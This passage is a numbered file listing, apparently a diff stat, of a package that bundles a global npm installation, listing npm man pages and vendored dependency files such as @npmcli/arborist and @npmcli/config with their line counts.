  331. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-link.1 +341 -0
  332. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-login.1 +95 -0
  333. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-logout.1 +75 -0
  334. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-ls.1 +269 -0
  335. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-org.1 +125 -0
  336. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-outdated.1 +182 -0
  337. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-owner.1 +110 -0
  338. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-pack.1 +130 -0
  339. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-ping.1 +52 -0
  340. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-pkg.1 +288 -0
  341. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-prefix.1 +63 -0
  342. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-profile.1 +137 -0
  343. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-prune.1 +170 -0
  344. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-publish.1 +221 -0
  345. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-query.1 +223 -0
  346. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-rebuild.1 +148 -0
  347. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-repo.1 +103 -0
  348. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-restart.1 +85 -0
  349. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-root.1 +56 -0
  350. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-run-script.1 +234 -0
  351. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-search.1 +156 -0
  352. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-shrinkwrap.1 +32 -0
  353. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-star.1 +76 -0
  354. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-stars.1 +41 -0
  355. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-start.1 +79 -0
  356. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-stop.1 +75 -0
  357. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-team.1 +148 -0
  358. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-test.1 +73 -0
  359. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-token.1 +130 -0
  360. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-uninstall.1 +159 -0
  361. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-unpublish.1 +135 -0
  362. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-unstar.1 +70 -0
  363. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-update.1 +392 -0
  364. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-version.1 +229 -0
  365. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-view.1 +205 -0
  366. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-whoami.1 +39 -0
  367. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm.1 +131 -0
  368. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npx.1 +156 -0
  369. package/.config/npm/node_global/lib/node_modules/npm/man/man5/folders.5 +152 -0
  370. package/.config/npm/node_global/lib/node_modules/npm/man/man5/install.5 +57 -0
  371. package/.config/npm/node_global/lib/node_modules/npm/man/man5/npm-global.5 +152 -0
  372. package/.config/npm/node_global/lib/node_modules/npm/man/man5/npm-json.5 +1064 -0
  373. package/.config/npm/node_global/lib/node_modules/npm/man/man5/npm-shrinkwrap-json.5 +23 -0
  374. package/.config/npm/node_global/lib/node_modules/npm/man/man5/npmrc.5 +129 -0
  375. package/.config/npm/node_global/lib/node_modules/npm/man/man5/package-json.5 +1064 -0
  376. package/.config/npm/node_global/lib/node_modules/npm/man/man5/package-lock-json.5 +156 -0
  377. package/.config/npm/node_global/lib/node_modules/npm/man/man7/config.7 +1986 -0
  378. package/.config/npm/node_global/lib/node_modules/npm/man/man7/dependency-selectors.7 +309 -0
  379. package/.config/npm/node_global/lib/node_modules/npm/man/man7/developers.7 +234 -0
  380. package/.config/npm/node_global/lib/node_modules/npm/man/man7/logging.7 +108 -0
  381. package/.config/npm/node_global/lib/node_modules/npm/man/man7/orgs.7 +145 -0
  382. package/.config/npm/node_global/lib/node_modules/npm/man/man7/package-spec.7 +126 -0
  383. package/.config/npm/node_global/lib/node_modules/npm/man/man7/registry.7 +51 -0
  384. package/.config/npm/node_global/lib/node_modules/npm/man/man7/removal.7 +60 -0
  385. package/.config/npm/node_global/lib/node_modules/npm/man/man7/scope.7 +113 -0
  386. package/.config/npm/node_global/lib/node_modules/npm/man/man7/scripts.7 +409 -0
  387. package/.config/npm/node_global/lib/node_modules/npm/man/man7/workspaces.7 +214 -0
  388. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/LICENSE +26 -0
  389. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/examples/normal-usage.js +83 -0
  390. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/examples/safe-string.js +80 -0
  391. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/lib/colors.js +211 -0
  392. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/lib/custom/trap.js +46 -0
  393. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/lib/custom/zalgo.js +110 -0
  394. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/lib/extendStringPrototype.js +110 -0
  395. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/lib/index.js +13 -0
  396. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/lib/maps/america.js +10 -0
  397. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/lib/maps/rainbow.js +12 -0
  398. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/lib/maps/random.js +11 -0
  399. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/lib/maps/zebra.js +5 -0
  400. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/lib/styles.js +95 -0
  401. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/lib/system/has-flag.js +35 -0
  402. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/lib/system/supports-colors.js +151 -0
  403. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/package.json +45 -0
  404. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/safe.js +10 -0
  405. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@colors/colors/themes/generic-logging.js +12 -0
  406. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/LICENSE.txt +14 -0
  407. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/build/index.cjs +317 -0
  408. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/build/index.d.cts +43 -0
  409. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/build/lib/index.js +302 -0
  410. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/index.mjs +14 -0
  411. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/ansi-regex/index.js +8 -0
  412. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/ansi-regex/license +9 -0
  413. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/ansi-regex/package.json +58 -0
  414. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/emoji-regex/LICENSE-MIT.txt +20 -0
  415. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/emoji-regex/RGI_Emoji.js +6 -0
  416. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/emoji-regex/es2015/RGI_Emoji.js +6 -0
  417. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/emoji-regex/es2015/index.js +6 -0
  418. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/emoji-regex/es2015/text.js +6 -0
  419. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/emoji-regex/index.js +6 -0
  420. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/emoji-regex/package.json +52 -0
  421. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/emoji-regex/text.js +6 -0
  422. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/string-width/index.js +54 -0
  423. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/string-width/license +9 -0
  424. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/string-width/package.json +59 -0
  425. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/strip-ansi/index.js +14 -0
  426. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/strip-ansi/license +9 -0
  427. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/node_modules/strip-ansi/package.json +57 -0
  428. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/cliui/package.json +86 -0
  429. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/string-locale-compare/LICENSE +15 -0
  430. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/string-locale-compare/index.js +42 -0
  431. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@isaacs/string-locale-compare/package.json +28 -0
  432. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/LICENSE.md +20 -0
  433. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/README.md +349 -0
  434. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/bin/actual.js +19 -0
  435. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/bin/audit.js +51 -0
  436. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/bin/funding.js +38 -0
  437. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/bin/ideal.js +14 -0
  438. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/bin/index.js +111 -0
  439. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/bin/lib/logging.js +77 -0
  440. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/bin/lib/options.js +123 -0
  441. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/bin/lib/print-tree.js +4 -0
  442. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/bin/lib/timers.js +33 -0
  443. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/bin/license.js +48 -0
  444. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/bin/prune.js +48 -0
  445. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/bin/reify.js +48 -0
  446. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/bin/shrinkwrap.js +7 -0
  447. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/bin/virtual.js +14 -0
  448. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/add-rm-pkg-deps.js +143 -0
  449. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/audit.js +43 -0
  450. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/build-ideal-tree.js +1511 -0
  451. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/deduper.js +19 -0
  452. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/index.js +167 -0
  453. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/isolated-reifier.js +453 -0
  454. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/load-actual.js +440 -0
  455. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/load-virtual.js +303 -0
  456. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/pruner.js +30 -0
  457. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/rebuild.js +433 -0
  458. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/reify.js +1593 -0
  459. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/arborist/set-workspaces.js +19 -0
  460. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/audit-report.js +414 -0
  461. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/calc-dep-flags.js +119 -0
  462. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/can-place-dep.js +436 -0
  463. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/case-insensitive-map.js +50 -0
  464. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/consistent-resolve.js +45 -0
  465. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/debug.js +31 -0
  466. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/deepest-nesting-target.js +18 -0
  467. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/dep-valid.js +150 -0
  468. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/diff.js +306 -0
  469. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/edge.js +301 -0
  470. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/from-path.js +30 -0
  471. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/gather-dep-set.js +43 -0
  472. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/get-workspace-nodes.js +36 -0
  473. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/index.js +8 -0
  474. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/inventory.js +138 -0
  475. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/link.js +126 -0
  476. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/node.js +1473 -0
  477. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/optional-set.js +38 -0
  478. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/override-resolves.js +11 -0
  479. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/override-set.js +147 -0
  480. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/peer-entry-sets.js +77 -0
  481. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/place-dep.js +569 -0
  482. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/printable.js +198 -0
  483. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/query-selector-all.js +850 -0
  484. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/realpath.js +95 -0
  485. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/relpath.js +3 -0
  486. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/reset-dep-flags.js +15 -0
  487. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/retire-path.js +19 -0
  488. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/shrinkwrap.js +1150 -0
  489. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/signal-handling.js +74 -0
  490. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/signals.js +58 -0
  491. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/spec-from-lock.js +34 -0
  492. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/tracker.js +102 -0
  493. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/tree-check.js +155 -0
  494. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/version-from-tgz.js +48 -0
  495. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/vuln.js +217 -0
  496. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/lib/yarn-lock.js +377 -0
  497. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/arborist/package.json +97 -0
  498. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/config/LICENSE +15 -0
  499. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/config/README.md +260 -0
  500. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/config/lib/definitions/definition.js +253 -0
  501. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/config/lib/definitions/definitions.js +2384 -0
  502. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/config/lib/definitions/index.js +76 -0
  503. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/config/lib/env-replace.js +14 -0
  504. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/config/lib/errors.js +23 -0
  505. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/config/lib/index.js +952 -0
  506. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/config/lib/nerf-dart.js +18 -0
  507. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/config/lib/parse-field.js +86 -0
  508. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/config/lib/set-envs.js +111 -0
  509. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/config/lib/type-defs.js +59 -0
  510. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/config/lib/type-description.js +21 -0
  511. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/config/lib/umask.js +36 -0
  512. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/config/package.json +55 -0
  513. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/disparity-colors/LICENSE +15 -0
  514. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/disparity-colors/lib/index.js +34 -0
  515. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/disparity-colors/package.json +70 -0
  516. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/fs/LICENSE.md +20 -0
  517. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/fs/lib/common/get-options.js +20 -0
  518. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/fs/lib/common/node.js +9 -0
  519. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/fs/lib/cp/LICENSE +15 -0
  520. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/fs/lib/cp/errors.js +129 -0
  521. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/fs/lib/cp/index.js +22 -0
  522. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/fs/lib/cp/polyfill.js +428 -0
  523. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/fs/lib/index.js +13 -0
  524. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/fs/lib/move-file.js +78 -0
  525. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/fs/lib/readdir-scoped.js +20 -0
  526. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/fs/lib/with-temp-dir.js +39 -0
  527. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/fs/package.json +52 -0
  528. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/git/LICENSE +15 -0
  529. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/git/lib/clone.js +172 -0
  530. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/git/lib/errors.js +36 -0
  531. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/git/lib/find.js +15 -0
  532. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/git/lib/index.js +9 -0
  533. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/git/lib/is-clean.js +6 -0
  534. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/git/lib/is.js +6 -0
  535. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/git/lib/lines-to-revs.js +147 -0
  536. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/git/lib/make-error.js +33 -0
  537. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/git/lib/opts.js +12 -0
  538. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/git/lib/revs.js +28 -0
  539. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/git/lib/spawn.js +44 -0
  540. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/git/lib/utils.js +3 -0
  541. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/git/lib/which.js +18 -0
  542. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/git/package.json +57 -0
  543. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/installed-package-contents/LICENSE +15 -0
  544. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/installed-package-contents/README.md +109 -0
  545. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/installed-package-contents/lib/index.js +242 -0
  546. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/installed-package-contents/package.json +51 -0
  547. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/map-workspaces/LICENSE.md +20 -0
  548. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/map-workspaces/lib/index.js +211 -0
  549. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/map-workspaces/package.json +60 -0
  550. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/metavuln-calculator/LICENSE +15 -0
  551. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/metavuln-calculator/lib/advisory.js +435 -0
  552. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/metavuln-calculator/lib/get-dep-spec.js +15 -0
  553. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/metavuln-calculator/lib/hash.js +5 -0
  554. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/metavuln-calculator/lib/index.js +128 -0
  555. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/metavuln-calculator/package.json +55 -0
  556. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/name-from-folder/LICENSE +15 -0
  557. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/name-from-folder/lib/index.js +7 -0
  558. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/name-from-folder/package.json +43 -0
  559. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/node-gyp/lib/index.js +14 -0
  560. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/node-gyp/package.json +48 -0
  561. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/package-json/LICENSE +18 -0
  562. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/package-json/lib/index.js +279 -0
  563. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/package-json/lib/normalize.js +372 -0
  564. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/package-json/lib/update-dependencies.js +75 -0
  565. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/package-json/lib/update-scripts.js +29 -0
  566. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/package-json/lib/update-workspaces.js +26 -0
  567. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/package-json/package.json +59 -0
  568. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/promise-spawn/LICENSE +15 -0
  569. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/promise-spawn/lib/escape.js +68 -0
  570. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/promise-spawn/lib/index.js +195 -0
  571. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/promise-spawn/package.json +50 -0
  572. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/query/LICENSE +20 -0
  573. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/query/lib/index.js +189 -0
  574. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/query/package.json +62 -0
  575. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/run-script/LICENSE +15 -0
  576. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/run-script/lib/is-server-package.js +12 -0
  577. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/run-script/lib/is-windows.js +2 -0
  578. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/run-script/lib/make-spawn-args.js +40 -0
  579. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/run-script/lib/node-gyp-bin/node-gyp +2 -0
  580. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/run-script/lib/node-gyp-bin/node-gyp.cmd +1 -0
  581. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/run-script/lib/package-envs.js +26 -0
  582. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/run-script/lib/run-script-pkg.js +112 -0
  583. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/run-script/lib/run-script.js +14 -0
  584. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/run-script/lib/set-path.js +45 -0
  585. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/run-script/lib/signal-manager.js +49 -0
  586. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/run-script/lib/validate-options.js +39 -0
  587. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@npmcli/run-script/package.json +53 -0
  588. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@pkgjs/parseargs/LICENSE +201 -0
  589. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@pkgjs/parseargs/examples/is-default-value.js +25 -0
  590. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@pkgjs/parseargs/examples/limit-long-syntax.js +35 -0
  591. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@pkgjs/parseargs/examples/negate.js +43 -0
  592. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@pkgjs/parseargs/examples/no-repeated-options.js +31 -0
  593. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@pkgjs/parseargs/examples/ordered-options.mjs +41 -0
  594. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@pkgjs/parseargs/examples/simple-hard-coded.js +26 -0
  595. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@pkgjs/parseargs/index.js +396 -0
  596. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@pkgjs/parseargs/internal/errors.js +47 -0
  597. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@pkgjs/parseargs/internal/primordials.js +393 -0
  598. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@pkgjs/parseargs/internal/util.js +14 -0
  599. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@pkgjs/parseargs/internal/validators.js +89 -0
  600. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@pkgjs/parseargs/package.json +36 -0
  601. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@pkgjs/parseargs/utils.js +198 -0
  602. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/protobuf-specs/LICENSE +202 -0
  603. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/protobuf-specs/dist/__generated__/envelope.js +89 -0
  604. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/protobuf-specs/dist/__generated__/google/api/field_behavior.js +119 -0
  605. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/protobuf-specs/dist/__generated__/google/protobuf/descriptor.js +1308 -0
  606. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/protobuf-specs/dist/__generated__/google/protobuf/timestamp.js +24 -0
  607. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/protobuf-specs/dist/__generated__/sigstore_bundle.js +106 -0
  608. package/.config/npm/node_global/lib/node_modules/npm/node_modules/@sigstore/protobuf-specs/dist/__generated__/sigstore_common.js +457 -0
